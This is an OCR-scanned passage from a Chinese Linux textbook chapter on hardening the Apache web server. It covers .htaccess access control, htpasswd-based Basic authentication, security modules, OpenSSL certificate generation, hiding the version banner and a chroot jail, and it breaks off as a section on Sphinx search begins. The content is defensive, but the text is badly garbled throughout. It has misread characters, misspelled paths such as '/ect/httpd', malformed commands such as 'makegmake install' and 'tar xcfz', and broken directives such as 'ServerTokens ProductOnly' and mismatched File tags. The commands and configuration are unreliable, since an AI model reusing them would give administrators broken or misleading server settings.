置 。 当 站 点 有 多 组 内 容 提供 者 并 希望 控制 这 些 用 户 对 他 们 空间 的 操作 时 ， 该 指令 非常 有 用 。 

需要 注意 的 是 , 除了 可 以 使 用 .htaccess 文件 针对 单一 目录 进行 访问 控制 配置 外 ,该 文件 还 
可 以 在 不 重新 启动 Apache 服务 器 的 前 提 下 使 配置 生效 ， 因 而 使 用 起 来 非常 方便 。 

使 用 该 文件 进行 访问 控制 ， 需 要 经 过 如 下 两 个 必要 的 步骤 : 


@ 在 主 配置 文件 httpd.conf 中 启用 并 控制 对 .htaccess 文件 的 使 用 。 
@ 在 需要 履 盖 主 配 置 文件 的 目录 下 (也 就 是 需要 单独 设 定 访问 控制 权限 的 目录 生 
成 .htaccess 文件 )， 对 其 进行 编辑 ， 并 设置 访问 控制 权限 。 


1. 启用 并 控制 对 .htaccess 文件 的 使 用 


想 要 启用 并 控制 对 .htaccess 文件 的 使 用 ， 需 要 使 用 AccessFileName 参数 在 主 配 置 文件 中 
配置 如 下 语句 : 
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Access FileName .htaccess 
<File ~ "^\.htaccess"> 
Order allow, deny 

Deny from all 

</Files> 


2. 在 .htaccess 文件 中 使 用 指令 进行 控制 
要 限制 .htaccess 文件 能 够 覆盖 的 内 容 ， 需 要 使 用 AllowOverride 指令 ， 该 指令 可 以 进行 全 


局 设置 或 者 单个 目录 设置 。 若 配置 默认 可 以 使 用 的 选项 ， 需 要 使 用 Options 指令 。 


单 。 


例如 ， 在 httpd.conf 文件 中 ， 可 以 采用 指令 建立 对 /var/wwvwwicons 目录 的 访问 控制 权限 清 
具体 指令 如 下 : 
<Directory "/var/www/icons"> 
Options Indexes MultiViews 
AllowOverride None 
Order allow deny 
Allow from all 
</Directory> 


3. 使 用 .htaccess 文件 的 例子 
下 面 以 一 个 简单 的 例子 来 示范 具体 该 如 何 使 用 .htaccess 文件 。 
加 在 Apache 服务 器 的 文档 根 目录 下 建立 一 个 测试 目录 ， 并 创建 测试 文件 。 需 要 使 用 如 下 


命令 : 


#cd /var/www/html 
#mkdir rhel5 

#cd rhel5 

#touch rhel5.a 
#touch rhel5.b 


加 修改 Apache 服务 器 的 主 配置 文件 。 添 加 下 面 所 示 的 语句 : 


Directory "/var/www/html/rhel5" 
AllowOverride Options 
Directory 


贺 在 生成 的 测试 目录 /var/www/htmlrhel5 下 生成 .htaccess 文件 ,并 添加 如 下 所 示 的 语句 : 


Options -Indexes 


加 重新 启动 Apache 服务 器 ， 就 可 以 看 到 在 配置 .htaccess 文件 前 用 户 可 以 使 用 客户 端 浏 


览 器 文件 ， 而 配置 文件 后 无 法 浏览 。 需 要 特别 注意 的 是 ， 这 里 的 重启 Apache 服务 器 是 因为 步 
又 2 中 对 主 配置 文件 进行 了 修改 ， 而 不 是 因为 修改 了 .htaccess 这 个 文件 。 因 为 前 面 提 到 过 ， 所 
以 .htaccess 文件 的 配置 修改 并 不 需要 重新 启动 Apache 服务 器 。 
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1.5.3 ”使 用 认证 和 授权 保护 Apache 
1. 认证 和 授权 指令 
目前 ， 有 两 种 常见 的 认证 类 型 ， 即 基本 认证 和 摘要 认证 。 


@ 基本 认证 (Basic): 使 用 最 基本 的 用 户 名 和 密码 方式 进行 用 户 认证 。 

@ 摘要 认证 (Digest): 该 认证 方式 比 基 本 认证 要 安全 得 多 ， 在 认证 过 程 中 额外 使 用 了 一 
个 针对 客户 端的 挑战 ( challenge ) 信息 , 可 以 有 效 地 避免 基本 认证 方式 可 能 遇 到 的 “ 钟 
放 攻 击 ”。 不 过 ， 目 前 并 不 是 所 有 的 浏览 器 都 支持 摘要 认证 方式 。 


所 有 的 认证 配置 指令 即 可 以 出 现在 主 配置 文件 httpd.conf 中 的 Director 容器 中 ， 也 可 以 出 
现在 单独 的 .htaccess 文件 中 , 可 以 根据 需要 灵活 选择 。 在 认证 配置 过 程 中 , 需要 用 到 如 下 指令 。 


@ Authname: 用 于 定义 受 保护 区 域 的 名 称 。 

@ AuthType: 用 于 指定 使 用 的 认证 方式 ， 包 括 上 面 所 述 的 Basic 和 Digest 两 种 方式 。 
@ AuthGroupFile: 用 于 指定 认证 组 文件 的 位 置 。 

@ AuthUserFile: 用 户 指定 认证 口令 文件 的 位 置 。 


使 用 上 述 的 认证 指令 配置 认证 之 后 ， 需 要 为 Apache 服务 器 访问 对 象 ， 也 就 是 指定 的 用 户 
和 组 进行 相应 的 授权 ， 以 便 它们 对 Apache 服务 器 提供 的 目录 文件 和 文件 进行 访问 。 
为 用 户 和 组 进行 授权 需要 使 用 Require 指令 ， 可 以 使 用 如 下 三 种 方式 进行 授权 。 


@ 授权 给 指定 的 一 个 或 者 多 个 用 户 : 使 用 Require user 用 户 名 1、 用 户 名 2.……. 
@ 授权 给 指定 的 一 个 或 者 多 个 组 : 使 用 Require group 用 户 名 1、 用 户 名 2.…… 
@ 授权 给 指定 口令 文件 中 的 所 有 用 户 : 使 用 Requirevalid-user。 


2. 管理 认证 口令 文件 和 认证 组 文件 


要 实现 用 户 认证 功能 ， 首 先 要 建立 保存 用 户 名 和 口令 的 文件 。Apache 自 带 的 htpasswd 命 
令 提供 了 建立 和 更 新 存储 用 户 名 、 密 码 文本 文件 的 功能 。 需要 注意 的 是 ， 这 个 文件 必须 放 在 不 
能 被 网 络 访问 的 位 置 ， 以 避免 被 下 载 或 信息 泄露 。 建 议 将 口令 文件 放 在 /ect/httpd/ 目 录 或 者 其 
子 目 录 下 。 

下 面 的 例子 是 在 /etc/httpd 目录 下 创建 文件 名 为 passwd_auth 的 口令 文件 ， 并 将 用 户 rhel5 
加 入 认证 口令 文件 。 使 用 以 下 命令 建立 口令 文件 过程 中 还 会 提示 输入 该 用 户 的 口令 〉: 

#touch passwd auth 

#htpasswd -c /ect/httpd/passwd auth rhel5 

New password: 


Re-type new password: 
Adding password for user rhel5 


在 命令 执行 的 过 程 中 ， 系 统 会 要 求 为 mhels 用 户 输入 密码 。 上 述 命令 中 的 “-c” 选 项 表示 
无 论 口 令 文件 是 否 已 经 存在 , 都 会 重新 写 入 文件 并 删 去 原 有 内 容 , 所 以 在 添加 第 2 个 用 户 到 口 


Linux ”企业 应 用 案例 精 解 


令 文件 时 ， 就 不 需要 使 用 “-c” 选 项 了 ， 使 用 以 下 命令 即 可 : 


#htpasswd /etc/httpd/passwd auth cgweb 


3. 认证 和 授权 使 用 实例 


(1) 使 用 主 配 置 文件 配置 用 户 认 证 及 授权 
在 本 例 中 ， 用 户 可 以 在 Apache 的 主 配 置 文件 httpd.conf 中 加 入 以 下 语句 ， 建 立 对 目录 
/Var/www/html/rhel5 访问 的 用 户 认证 和 授权 机 制 : 
<Directory "/var/www/html/rhel5 " 
AllowOverride None 
AuthType Basic 
AuthName "rhel5™ 
AuthUserFile /etc/httpd/passwd auth 


Require user rhel5 cgweb 
</Directory> 


在 上 述 例子 中 ， 使 用 的 指令 含义 说 明 如 下 。 


@ AllowOveride: 该 选项 定义 不 使 用 htaccess 文件 。 

@ AuthType Basic: AuthType 选项 定义 对 用 户 实施 认证 的 类 型 ， 最 常用 的 是 由 mod_auth 
提供 的 Basic。 

@ AuthName: 定义 Web 浏览 器 显示 输入 用 户 / 密 码 对 话 框 时 的 领域 内 容 。 

@ AuthUserFile: 定义 口令 文件 的 路 径 ， 即 使 用 htpasswd 建立 的 口令 文件 。 

@ Require user: 定义 允许 哪些 用 户 访问 ， 各 用 户 之 间 用 空格 分 开 。 


需要 注意 的 是 ， 在 AuthUserFile 选项 定义 中 ， 还 要 使 用 语句 事先 建立 认证 用 户 rhel5 和 
cgweb， 该 选项 中 的 定义 才能 生效 。 
具体 语句 如 下 : 


#htpasswd -c /ect/httdp/passwd auth rhel5 
#htpasswd /ect/httpd/passwd auth cgweb 


(2) 使 用 .htaccess 文件 配置 用 户 认证 和 授权 
在 本 例 中 ， 为 了 完成 如 上 述 例子 同样 的 功能 ， 需 要 先 在 主 配置 文件 中 加 入 如 下 语句 : 
<Directory "/var/www/html/rhel5"> 


AllowOverride AuthConfig 
</Directory> 


上 述 语句 中 的 AllowOverride 选项 允许 在 .htaccess 文件 中 使 用 认证 和 授权 指令 ， 然 后 ， 
在 .htaccess 文件 中 添加 以 下 语句 即 可 : 

AuthType Basic 

AuthName "Please Login:" 


AuthUserFile /ect/httpd/passwd auth 
Require user rhel5 cgweb 
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在 AutheUserFile 选项 定义 中 ,也 要 使 用 如 下 语句 事先 建立 认证 用 户 rhel5 和 cgweb, 该 选 
项 中 的 定义 才能 生效 : 

#htpasswd -c /ect/http/passwd auth rhel5 

#htpasswd /ect/httpd/passwd authcgweb 


1.5.4 


和 


使 用 Apache 中 的 安全 模块 
找 出 Aphache 服务 器 中 安全 的 相关 模块 


Apache 的 一 个 优势 便 是 有 灵活 的 模块 结构 ， 其 设计 思想 也 是 围绕 模块 (Module) 概念 而 
展开 的 。 安 全 模块 是 ApacheSever 中 极 重 要 的 组 成 部 分 ， 这 些 安全 模块 负责 提供 ApacheSever 
的 访问 控制 、 认 证 、 授 权 等 一 系列 至 关 重 要 的 安全 服务 。 

Apache 具有 如 下 几 类 与 安全 相关 的 模块 。 


mod_access 模块 : 能 够 根据 访问 者 的 卫 地址 或 域名 、 主 机 名 等 ， 控 制 对 Apache 服务 
器 的 访问 ， 称 之 为 基于 主机 的 访问 控制 。 

mod_auth 模块 : 用 来 控制 客户 和 组 的 认证 授权 ( Authentication )， 用 户 名 和 口令 存 于 
纯 文 本 文件 中 。 

mod_auth db 和 mod_auth_dbm 模块 : 分 别 将 用 户 信 息 (如 名 称 、 组 属 和 口令 等 ) 存 
于 Berkeley-DB 及 DBM 型 的 小 型 数据 库 中 ， 便 于 管理 及 提高 应 用 效率 。 
mod_auth_digest 模块 : 采用 MD5 数字 签名 方式 进行 用 户 认证 ， 但 它 需要 客户 端的 支 
持 。 

mod_auth_anon 模块 : 功能 和 mod_auth 的 功能 类 似 ， 只 是 它 允 许 匿 名 登录 ， 将 用 户 输 
入 的 E-mail 地 址 作为 口令 。 

Mod ssl 被 Apache 模块 : 用 于 支持 安全 套 接 字 层 协议 ， 提 供 Internet 上 的 安全 交易 服 
务 , 如 电子 商务 中 的 一 项 安全 措施 . 通过 对 通信 字 节 流 的 加 密 来 防止 敏感 信息 的 泄露 。 
但 是 ，Apache 的 这 种 支持 是 建立 在 对 Apache 的 API 扩展 来 实现 的 ， 相 当 于 一 个 外 部 
模块 ， 通 过 与 第 三 方程 序 (如 OpenSSL ) 的 结合 提供 安全 的 网 上 交易 支持 。 


2. 开启 安全 模块 


为 


了 能 使 用 模块 功能 ， 模 块 通常 以 DSO (Dyname Shared Object) 的 方式 构建 ， 用 户 应 


该 在 httpd.conf 文件 中 使 用 LoadModule 指令 ， 以 便 在 使 用 前 获得 模块 的 功能 。 以 下 是 主 配 
置 文件 中 各 个 模块 的 情况 ， 开 启 安 全 模块 非常 简单 ， 即 去 掉 在 各 安全 模块 所 在 行 前 的 “#” 
符号 即 可 。 

具体 如 下 : 

LoadModule auth basic module modules/mod auth basic.so 


LoadModule auth digest module modules/mod auth diaest.so 
LoadModule authn alias module modules/mod authn alias.so 
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1.5.5 ”使 用 SSL 保证 Web 通信 安全 


Apache 服务 器 与 客户 端的 通信 是 明文 方式 ， 很 多 通过 HTTP 协议 传送 数据 的 应 用 将 受到 
黑客 的 威胁 , 信息 安全 难以 得 到 保障 。 在 通常 的 连接 方式 中 , 通信 和 是 以 非 加 密 的 形式 在 网 络 上 
传播 的 ， 这 就 有 可 能 被 非法 窃听 到 ， 尤 其 是 用 于 认证 的 口令 信息 。 为 了 避免 这 个 安全 漏洞 ， 就 
必须 对 传输 过 程 进行 加 密 。 

对 HITP 传输 进行 加 密 的 协议 为 HTTPS， 是 通过 SSL 进行 HTTP 传输 的 协议 ， 不 但 通过 
公用 密 匙 的 算法 进行 加 密 、 保 证 传输 的 安全 性 , 还 可 以 通过 获得 认证 证 书 CA 来 保证 客户 连接 
的 服务 器 没有 被 假冒 。SSL 是 一 种 国际 标准 的 加 密 身 份 证 通信 协议 , 用 户 采用 的 浏览 器 就 支持 
此 协议 。SSL (Secure Sockets Layer) 最 初 是 由 美国 Netscape 公司 研究 出 来 的 , 后 来 成 为 Internet 
网 上 安全 通信 与 交易 的 标准 。SSL 协议 使 用 通信 双方 的 客户 证 书 以 及 CA 认证 证 书 , 允许 客户 
/服务 器 应 用 以 一 种 不 能 被 偷 听 的 方式 通信 ， 在 通信 双方 间 建 立 起 了 一 条 安全 、 可 信 的 通信 通 
道 。SSL 协议 的 基本 特征 是 信息 保密 性 、 信 息 完整 性 以 及 相互 鉴定 。 可 以 使 用 开源 的 OpenSSL 
保护 Apache 通信 安全 。 


1. 安装 OpenSSL 
虽然 Apache-SSL 集成 了 Apache 服务 器 和 SSL, 但 它 有 两 个 可 以 自由 使 用 的 、 支 持 SSL 
的 相关 计划 : 


@ Apache-SSL。 继 承 了 Apache 服务 器 和 SSL。 
@ Apachetmod ssl， 支 持 SSL， 其 中 mod-ssl 是 由 前 一 个 分 化 出 的 模块 ， 而 且 因为 使 用 
模块 ， 易 用 性 很 好 ， 因 此 使 用 范围 更 为 广泛 。 


当然 ， 也 有 基于 Apache 并 集成 了 SSL 能 力 的 商业 Web 服务 器 ， 可 供 选择 使 用 。 

Apache+mod ssl 依赖 于 另外 一 个 软件 OpenSSL， 它 是 一 个 可 以 自由 使 用 的 SSL 实现 。 首 
先 需 要 安装 这 个 软件 。 可 以 从 网 站 http//www.openssl.org/source/ 上 下 载 Linux 下 OpenSSL 的 最 
新 稳定 版 本 : openssl-0.9.8k.tar.gz〔 目 前 发 布 的 beta 测试 版 本 为 : openssl-1.0.0-betal.tar.gz) 。 

从 稳定 性 方面 考虑 ， 本 文采 用 稳定 版 本 进行 安装 使 用 。 

下 载 源 代码 安装 包 后 ， 使 用 如 下 的 步骤 安装 即 可 : 

利用 openss-0.9.8k.tar.gz 软件 包装 OpenSSL 之 前 ， 首 先 要 对 该 软件 包 进 行 解压 缩 : 

#tar xcfz openssl-0.9.8k.tar,gz 

加 解压 缩 后 ， 进 入 源 代码 的 目录 openssL-0.9.8k， 并 使 用 配置 脚本 进行 环境 的 设置 。 改 
变 当前 目录 为 openssl-0.9.8k 目录 : 


#cd openssl-0.9.8k 


贺 执行 该 目录 下 的 配置 脚本 程序 : 


#./configure 
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在 执行 完 ./configure 之 后 ， 配 置 脚本 会 自动 生成 Makefile。 如 果 在 设置 过 程 中 没有 任 
何 错误 ， 就 可 以 编译 源码 了 。 相 应 命令 如 下 : 


#makegmake install 


需要 说 明 的 是 ，OpenSSL 已 经 在 Red Hat Enter Linux 5 系统 中 自 带 ， 其 PPM 包 的 版 本 
为 openssl-0.9.8b-B.3.e15.RPM。 用 户 也 可 以 在 安装 光盘 中 找到 该 软件 包 后 ， 执 行 以 下 命令 
进行 安装 : 

#rpm-ivh openssl-0.9.8b-8.3.e15.rpm 


安装 好 OpenSSL 后 ， 就 可 以 安装 使 用 Apachetmod ssl 了 。 为 了 安装 正确 ， 需 要 清楚 原先 
安装 的 Apache 服务 器 的 设置 文件 及 其 他 默认 设置 文件 ， 以 避免 出 现 安装 问题 。 最 好 也 删除 
/userlocal/www 目录 (或 改名 ) ， 以 使 安装 程序 能 建立 正确 的 初始 文档 目录 。 

如 果 是 一 台 没 有 安装 过 Apache 服务 器 的 新 系统 ， 就 可 以 忽略 该 步骤 ， 直 接 安装 Apache 
即 可 。 

该 模块 也 在 Red Hat Eenterprise Linux 5 系统 中 自 带 , 其 安装 包 为 mod_ss-2.2.3-6.el5, 用 户 
也 可 以 参照 OpenSSL 的 RPM 包 安 装 方法 进行 安装 。 


2. 为 OpenSSL 产生 认证 凭证 


采用 OpenSSL 进行 Apache 通信 加 密 前 , 需要 先 产 生 与 加 密 相关 的 认证 凭证 。 SSL 服务 器 
证 书生 成 具体 代码 如 下 : 


# openssl genrsa -out apache.key 1024 \\ 生 成 服务 器 证 书 私 钥 \\ 
# openssl req-new-key Apache.key -out apache.csr \\ 生 成 服务 器 证 书 请 求 文件 \\ 


生成 服务 器 证 书 请 求 文件 。 
生成 CA 根 证 书 ， 利 用 已 生成 的 服务 器 证 书 私 钥 ， 生 成 服务 器 证 书 请 求 esr 文件 。 


# openssl req -new -x509 -key cakey.pem -out cacert.pem 


# openssl x509 -req-days 365 -in apache.csr -singnkey apache.key -out 
apache.crt 


执行 了 上 述 代 码 后 ， 将 会 产生 三 个 文件 ， 分 别 是 apache.csr、apache.key 和 apache.crt， 然 
后 把 这 三 个 文件 复制 到 /etc/httpd/conf/ca 目录 下 即 可 。 


3. 启动 和 关闭 OpenSSL 


完成 上 述 工作 后 ， 下 一 步 就 是 开启 具有 SSL 功能 的 Apache 服务 器 。 启 动 和 关闭 该 服务 器 
的 命令 如 下 。 


®@ #apachectl start: 启动 Apache。 
#apachectl startssl: 启动 Apache SSL。 
#apachectl stop: 停止 启动 Apache。 
#apachectl restart: 重新 启动 Apache。 
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®@ #apachectl status: 显示 Apache 的 状态 。 
@ #apachectl configtest: 测试 httpd.conf 配置 是 否 正确 。 


使 用 startssl 参数 表示 启动 带 ssl 能 力 的 httpd 守护 进程 .如 果 之 前 Apache 的 守护 进程 正在 
运行 ， 需 要 先 使 用 stop 参数 停止 服务 器 运行 : 


#/user/local/sbin/apachectl] start 


然后 ， 就 可 以 启动 Mozilla、IE 或 其 他 支持 SSL 的 浏览 器 。 输 入 https://ssl_sever/ 来 查看 服 
务 器 是 否 有 响应 。HTTPS 使 用 的 默认 端口 为 443， 如 果 一 切 正 常 ， 服 务 器 将 会 返回 给 客户 端 
证 书 ， 由 客户 端 进行 验证 并 且 判 断 是 否 接受 该 证 书 ， 再 进行 下 一 步 的 通信 过 程 。 


1.5.6 ”其 他 安全 措施 


1. 使 用 专用 用 户 运 行 Apache 服务 器 


一 般 情况 下 ， 在 Linux 下 启动 Apache 服务 器 的 进程 httpd 需要 root 权限 。 由 于 root 权限 
太 大 ， 存 在 许多 潜在 的 对 系统 的 安全 造成 威胁 的 漏洞 ， 一 些 管理 员 为 了 安全 考虑 ， 认 为 HTTP 
服务 器 不 可 能 没有 安全 漏洞 ， 因 而 更 愿意 使 用 普通 用 户 的 权限 来 启动 服务 器 。 

http.conf 主 配置 文件 里 面 有 两 个 配置 是 Apache 的 安全 保证 , 分别 是 User 和 Group Apache。 
Apache 在 启动 之 后 ， 按 这 两 个 选项 设置 的 用 户 和 组 权限 进行 运行 ， 这 样 就 降低 了 服务 器 的 危 
险 性 。 

需要 指出 的 是 , 这 两 个 配置 在 主 配置 文件 里 面 是 默认 选项 , 当 采 用 root 用 户 身份 运行 httpd 
进程 后 ， 系 统 就 自动 将 该 进程 的 用 户 组 合 权限 改 为 Apache。 这 样 ，httpd 进程 的 权限 就 被 限制 
在 Apache 用 户 和 组 范围 内 ， 进 而 保证 了 安全 。 


F 隐藏 Apache 服务 器 的 版 本 号 


Apache 服务 器 的 版 本 号 可 能 被 黑客 利用 并 入 侵 。 黑 客 们 通常 在 获得 版 本 号 后 ， 通 过 网 上 
搜索 该 版 本 号 ,进一步 确定 使 用 哪 类 技术 或 工具 进行 有 针对 性 地 入 侵 。 因此 , 为 了 避免 一 些 不 
必要 的 麻烦 和 安全 隐患 ， 可 以 通过 主 配置 文件 httpd.conf 下 的 以 下 两 个 选项 隐藏 版 本 信息 。 


@ Server Tokens: 该 选项 用 于 控制 服务 器 是 否 响应 来 自 客户 端的 请 求 ， 向 客户 端 输出 服 
务 器 的 请 求 ， 向 客户 端 输 出 系统 类 型 或 者 相应 的 内 置 模块 等 重要 信息 。Red Hat 
Enterprise Linux 5 操作 系统 在 主 配置 文件 中 提供 全 局 默认 的 控制 闪 值 为 OS， 即 
ServerTokersOS。 它 将 向 客户 端 公开 与 操作 系统 信息 相关 的 敏感 信息 ， 所 以 需要 在 该 
选项 后 使 用 ProdectOnly， 即 ServerTokens ProductOnly。 

@ ServerSignature: 该 选项 控制 由 系统 产生 的 页 面 (错误 信息 等 )。 默 认 情况 下 为 Off， 
即 ServerSignature Off， 该 情况 下 不 输出 任何 页 面 信息 。 另 一 情况 为 On， 即 
ServerSingnature On, 该 情况 下 输出 一 行 关于 版 本 号 等 的 相关 信息 。 安全 情况 下 应 该 将 
其 状态 设 为 Off。 
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3. 设置 虚拟 目录 和 目录 权限 

要 从 主 目录 以 外 的 其 他 目录 中 进行 发 布 ， 就 必须 创建 虚拟 目录 。 虚 拟 目录 是 位 于 Apache 主 
目录 外 的 目录 ， 它 不 包含 在 Apache 的 主 目录 中 ， 但 在 访问 Web 站 点 的 用 户 看 来 ， 它 与 位 于 主 目 
录 中 的 子 目录 是 一 样 的 。 每 个 虚拟 目录 都 有 一 个 别名 , 用 户 在 Web 浏览 器 中 可 以 通过 此 名 来 访问 
虚拟 目录 ， 如 http://Server IP /Alias/ 文 件 名 ， 就 可 以 访问 虚拟 目录 下 的 任何 文件 了 。 

使 用 Alias 选项 可 以 创建 虚拟 目录 。 在 主 配置 文件 中 ，Apache 默认 已 经 创建 了 两 个 虚拟 目 
录 。 这 两 条 语句 分 别 建立 了 “/icons/” 和 “/manual” 两 个 虚拟 目录 ， 它 们 对 应 的 物理 路 径 分 别 
是 “/var/www/icons/” 和 “/var/www/manual”。 


主 配 置 文件 中 ， 用 户 可 以 看 到 以 下 配置 语句 : 


Alias /icons "/var/www/icons/" 
Alias /manual "/var/www/manual" 


在 实际 使 用 过 程 中 ， 用 户 可 以 自己 创建 虚拟 目录 ， 比 如 创建 名 为 “/user” 的 虚拟 目录 ， 它 
所 对 应 的 路 径 为 上 面 几 个 例子 中 常用 的 /var/www/html/rhel5: 


Alias /test "/var/www/html/rhel5" 
如 果 需 要 对 其 机 型 进行 权限 设置 ， 可 以 加 入 以 下 语句 : 


<Directory "/var/www/html/rhel5"> 
AllowOverride None 

Options Indexes 

Order allow,deny 

Allow from all 

</Directory> 


设置 该 虚拟 目录 和 目录 权限 后 , 可 以 使 用 客户 端 浏 览 器 进行 测试 验证 , 采用 别名 对 该 目录 
中 的 文件 进行 访问 。 上 述 目 录 的 权限 设置 还 可 以 使 用 htaccess 文件 进行 单独 设置 。 这 里 不 再 举 
例 歼 述 。 

4. 使 Web 服务 运行 在 “监牢 ”中 

Apache 服务 器 需要 绑 定 到 80 端口 上 来 监听 请 求 , 而 root 是 唯一 有 这 种 权限 的 用 户 。 随 着 
攻击 手段 和 强度 的 增加 ,这 会 使 服务 器 受到 相当 大 的 威胁 , 一 旦 有 缓冲 区 溢出 漏洞 被 利用 ， 黑 
客 就 可 以 控制 整个 系统 ,为 了 进一步 提高 系统 的 安全 性 , Linux 内 核 引 入 了 Chroot 机 制 。 Chroot 
是 内 核 中 的 一 个 系统 调用 ， 可 以 让 软件 通过 调用 函数 库 的 Chroot 函数 来 更 改 某 个 进程 所 能 见 
到 的 根 目录 。 


(1) “监牢 ”技术 特点 

Chroot 机 制 ， 即 将 某 软件 运行 限制 在 指定 目录 中 ， 保 证 该 软件 只 能 对 该 目录 及 子 目 录 的 
文件 有 所 动作 ， 从 而 保证 整个 服务 器 的 安全 。 在 这 种 情况 下 ,即使 有 黑客 或 者 不 法 用 户 通过 该 
软件 破解 或 者 侵入 系统 ，Linux 系统 所 受 的 攻击 仅 限于 该 设 定 的 根 目 录 ， 而 不 会 影响 到 整个 系 
统 的 其 他 部 分 。 将 软件 Chroot 化 的 一 个 问题 是 该 软件 运行 时 所 需要 的 所 有 程序 、 配 置 文件 和 
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库 文件 都 必须 事先 安装 到 Chroot 目录 中 ， 通 常 称 这 个 目录 为 Chroot“ 监 牢 ”。 如 果 在 “监牢 ” 
中 运行 httpd， 那 么 用 户 根本 看 不 到 Linux 文件 系统 中 真正 的 目录 。 从 而 保证 了 Linux 系统 的 
安全 。 在 使 用 该 技术 的 时 候 ， 一 般 情况 下 需要 事先 创建 目录 ， 并 将 进程 的 可 执行 文件 httpd 复 
制 到 其 中 ， 同 时 ， 由 于 HTTP 需要 几 个 库 文件 ， 所 以 需要 把 httpd 程序 依赖 的 几 个 Lib 文件 也 
同时 复制 到 同一 个 目录 下 , 因此 手工 完成 这 一 工作 是 非常 麻烦 的 。 幸运 的 是 ， 用 户 可 以 通过 使 
用 开源 的 Jail 软件 包 来 简化 Chroot“ 监 牢 ” 建 立 的 过 程 。Jail 官方 网 站 是 
http://www.jmceresearch.com/， 其 最 新 版 本 为 jail_ 1.ga.gz。 


(2) 安装 Jail 软件 
首先 从 以 下 链接 http://www.jmeresearch.com/ataic/dwn/projectc/jail/jail_1.9a.tar.gz 将 其 下 
载 ， 然 后 执行 如 下 命令 进行 源 代码 包 的 编译 和 安装 : 
#tar ~xyz “Jail -datar. gz 
#cd jail/arc 
#make 
(3) 用 Jail 创建 Chroot“ 监 牢 ” 
Jail 软件 包 提 供 了 几 个 Perl 脚本 作为 其 核心 命令 ,包括 mkjailenv、Addjailsw 和 Addjailuser， 
它们 位 于 解压 后 的 目录 jail/bin 中 。 
这 些 命令 的 基本 用 途 如 下 。 
@ Mkjailenv: 用 于 创建 Chroot “监牢 ”目录 ， 并 从 真实 文件 系统 中 复制 基本 的 软件 环境 。 
@ Addjailsw: 用 于 从 真实 文件 系统 中 复制 二 进 制 可 执行 文件 及 相关 的 其 他 的 文件 ( 包括 
库 文件 、 辅 助 性 文件 和 设备 文件 ) 到 该 “监牢 ”中 。 
@ Addjailuser: 创建 新 的 Chroot“ 监 牢 ” 用 户 。 
利用 Jail 创建 监牢 的 步骤 说 明 如 下 。 


加 首先 需要 停止 目前 运行 的 httpd 服务 ， 然 后 建立 Chroot 目录 。 命 令 如 下 所 示 ( 该 命令 
将 Chroot 目录 建立 在 路 径 /root/chroot/httpd 中 ) : 


#service httpd stop 
# mkjailenv /root/chroot/httpd 
Kjailerv 
A component of Jail (evrsion 1.9 for linux) 
http://www.gsyc.inf.uc3m.es/assman/jail/ 
Ju M.Cmsillas- assman@gsyc.inf.uc3m.es 
Making chrooted environment into /root/chroot/httpd 
Doing preinstall( ) 
Doing special devices( ) 
Doing gen template password( ) 
Doing postinstall( ) 
Done. 


贺 为 “监牢 ”添加 httpd 程序 ,命令 如 下 : 
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#./addjailsw /root/chroot/httpd/ -p /usr/sbin/httpd 
addjailsw 

A component of Jail (version 1.9 for linux) 
http//www.gsyc.inf.uc3m.es/-assman/jail/ 

Juan M.Cassillas assman@gsyc.inf.uc3m.es 

Warning: Can't create/proc filesystem 

Done. 


在 上 述 过 程 中 ， 用 户 不 需要 在 意 那些 警告 信息 ， 因 为 Jail 会 调用 ldd 检查 httpd 用 到 的 库 
文件 。 几 乎 所 有 基于 共享 库 的 二 进 制 可 执行 文件 都 需要 上 述 的 几 个 库 文件 。 
贺 将 HTTP 的 相关 文件 复制 到 “监牢 ”的 相关 目录 中 。 命 令 如 下 : 


# mkdir -p /root/chroot/httpd/ect 
# cp -a /ect/httpd /root/chroot/httpd/ect 


加 添加 后 的 目录 结构 如 下 所 示 : 


Et 

drwxr-xr-x 2 root root 4096 03-23 13:44 dev 
drwxr-xr-x 3 root root 4096 03-23 13:46 ect 
区 
4 


root root 4096 03-23 13:46 lib 
drwxr-xr-x root root 4096 03-23 13:46 selinux 
drsrwxrwx 2 root root 4096 03-23 13:46 dtmp 
drwxr-xr-x 4 root root 4096 03-23 13:46 usr 
drwxr-xr-x 3 root root 4096 03-23 13:46 var 


加 重新 启动 htpd， 并 使 用 PS 命令 检查 httpd 进程 ， 发 现 该 进程 已 经 运行 在 “监牢 ”中 。 
如 下 所 示 : 


# ps -aux |grep httpd 
Waring: bad syntax, 
Pathaps a bogus "-"? sea/usr/share/doc/procps-3.2.3/FAO 
Root 3546 0.6 0.3 3828 1712 pts/2 S13:57 0:00/usr/sbin/nss pcache off 
/ect/httpd/alias 
Root 3550 14.2.3.6 49388 17788?Rs1l 13:57 0:00/root/chroot/httpd/httpd 


drwxr-xr-x 


Apache 3560 0.2 1.4 49388 6888?S13:57 0:00/root/chroot/httpd/httpd 
Apache 3561 0. .4 49388 6888?S13:57 0:00/root/chroot/httpd/httpd 
Apache 3562 0. .4 49388 6888?S13:57 0:00/root/chroot/httpd/httpd 


2 
DOs 
Apache 3563 0.2 49388 6888?S13:57 0:00/root/chroot/httpd/httpd 
Apache 3564 0.2 49388 6888?S13:57 0:00/root/chroot/httpd/httpd 
js 49388 6888?S13:57 0:00/root/chroot/httpd/httpd 
i 49388 6888?S13:57 0:00/root/chroot/httpd/httpd 

0.0 


4124 688?ps/2R+ 13:57 0:00 grep httpd 


Apache 3565 
Apache 3566 
Apache 3568 


oppppppp 
上 心心 心心 心心 心 


1.6 利用 Sphinx 提高 LAMP 应 用 检索 性 能 


由 于 网 站 数据 量 的 日 益 庞大 , 网 站 的 数据 检索 响应 时 间 也 越 来 越 慢 。 要 解决 这 个 问题 通常 
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做 的 就 是 提高 机 器 的 硬件 处 理 能 力 ， 来 缓解 数据 激增 而 带 来 的 压力 ， 而 Sphinx 的 出 现 ， 弥 补 
了 LAMP 架构 在 管理 、 利 用 数据 上 的 短 板 。Sphinx Search 在 提供 全 文 检索 功能 的 同时 ， 不 需 
要 对 现 有 的 LAMP 系统 架构 进行 大 幅度 的 调整 ， 就 可 以 提升 系统 的 性 能 ， 并 节省 了 开销 。 下 
i 介绍 Sphinx 是 如 何在 LAMP 中 应 用 的 。 

Sphinx 是 基于 SQL 的 全 文 检索 引擎 ， 但 对 中 文 用 户 来 说 ， 一 个 致命 的 缺陷 是 不 支持 中 文 
但 在 网 上 有 基于 Sphinx 的 支持 切 词 的 全 文 搜索 引擎 sphinx-for-chinese。 下 载 并 安装 后 发 现 很 
好 用 ， 下 面 介绍 具体 的 安装 过 程 。 


加 下 载 所 需 的 安装 包 。 


sphinx-for-chinese-0.9.9-r2117.tar.gz 
